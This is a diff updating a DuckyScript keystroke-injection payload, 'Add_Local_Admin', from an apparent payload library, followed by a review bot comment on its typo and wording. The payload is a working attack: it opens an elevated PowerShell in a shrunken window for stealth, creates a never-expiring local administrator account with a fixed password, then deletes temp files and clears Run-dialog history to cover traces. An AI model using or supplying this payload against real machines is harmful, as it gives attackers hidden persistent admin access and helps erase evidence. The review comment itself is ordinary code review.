Update payload.txt #232
83 changes: 50 additions & 33 deletions payloads/library/execution/Add_Local_Admin/payload.txt
@@ -1,71 +1,88 @@
REM Title: Add_Local_Admin
EM Title: Add_Local_Admin
REM Author: LulzAnarchyAnon
REM Description: Administrator PowerShell is opened, and a script
REM runs that adds a Local Admin User.
REM Target: Windows 10 PowerShell
REM Description: Administrator PowerShell is opened, and resized for a more stealthy payload delivery, then the payload
REM creates a local admin account on the target system, afterwards powershell exits, and all history is cleared.
REM Target: Windows 10 and 11
REM Props: Darren Kitchen, and I am Jakoby
REM Version: 1.0
REM Version: 2.0
REM Category: Execution

GUI x
GUI r
DELAY 500
a
STRING powershell -Command "Start-Process PowerShell -Verb RunAs"
DELAY 500
ENTER
DELAY 500
ALT y
Delay 2000

DELAY 1000
STRING PowerShell.exe -noe -c ". mode.com con: lines=5 cols=12"
DELAY 1000
ENTER
DELAY 1000
STRING $Username = "Admin2"
DELAY 2000
DELAY 1000
ENTER
STRING $Password = "password"
DELAY 2000
DELAY 1000
ENTER
STRING $group = "Administrators"
DELAY 2000
DELAY 1000
ENTER
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
DELAY 5000
DELAY 1000
ENTER
STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
DELAY 5000
DELAY 1000
ENTER
STRING if ($existing -eq $null) {
DELAY 2000
DELAY 1000
ENTER
STRING Write-Host "Creating new local user $Username."
DELAY 5000
STRING Write-Host "Creating new local user $Username."
DELAY 1000
ENTER
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 5000
STRING & NET USER $Username $Password /add /y /expires:never
DELAY 1000
ENTER
STRING Write-Host "Adding local user $Username to $group."
DELAY 5000
STRING Write-Host "Adding local user $Username to $group."
DELAY 1000
ENTER
STRING & NET LOCALGROUP $group $Username /add
DELAY 5000
STRING & NET LOCALGROUP $group $Username /add
DELAY 1000
ENTER
STRING }
DELAY 2000
DELAY 1000
ENTER
STRING {
DELAY 2000
DELAY 1000
ENTER
STRING Write-Host "Setting password for existing local user $Username."
DELAY 5000
STRING Write-Host "Setting password for existing local user $Username."
DELAY 1000
ENTER
STRING $existing.SetPassword($Password)
DELAY 2000
STRING $existing.SetPassword($Password)
DELAY 1000
ENTER
STRING }
DELAY 2000
DELAY 1000
ENTER
STRING Write-Host "Ensuring password for $Username never expires."
DELAY 5000
DELAY 1000
ENTER
STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
DELAY 5000
DELAY 1000
ENTER
DELAY 1000
STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
DELAY 500
ENTER
DELAY 500
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
DELAY 500
ENTER
DELAY 200
STRING exit
DELAY 200
ENTER
DELAY 200
STRING exit
DELAY 100
DELAY 200
ENTER
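Review bot: the first added line reads `EM Title: Add_Local_Admin` where the removed line read `REM Title: Add_Local_Admin`; `EM` is not a DuckyScript keyword, so this looks like a dropped character and the line should be restored to `REM Title: Add_Local_Admin`. The new header also overstates what the script does: it claims "all history is cleared", but the cleanup added at the end only empties the user's temp folder (`rm $env:TEMP\* -r -Force`, which deletes unrelated files under `$env:TEMP`, not just this payload's traces) and clears the `RunMRU` key of the Run dialog, while the substantive changes the script makes (a new local account with a fixed password, added to `Administrators` via `NET LOCALGROUP`, with `PasswordExpires=FALSE` set through WMIC) all remain on the system; the description should state that accurately rather than calling the result stealthy. Separately, `Delay 2000` after `ALT y` is lowercase while every other command in the file is uppercase; keep the file consistent with the `DELAY` spelling used everywhere else.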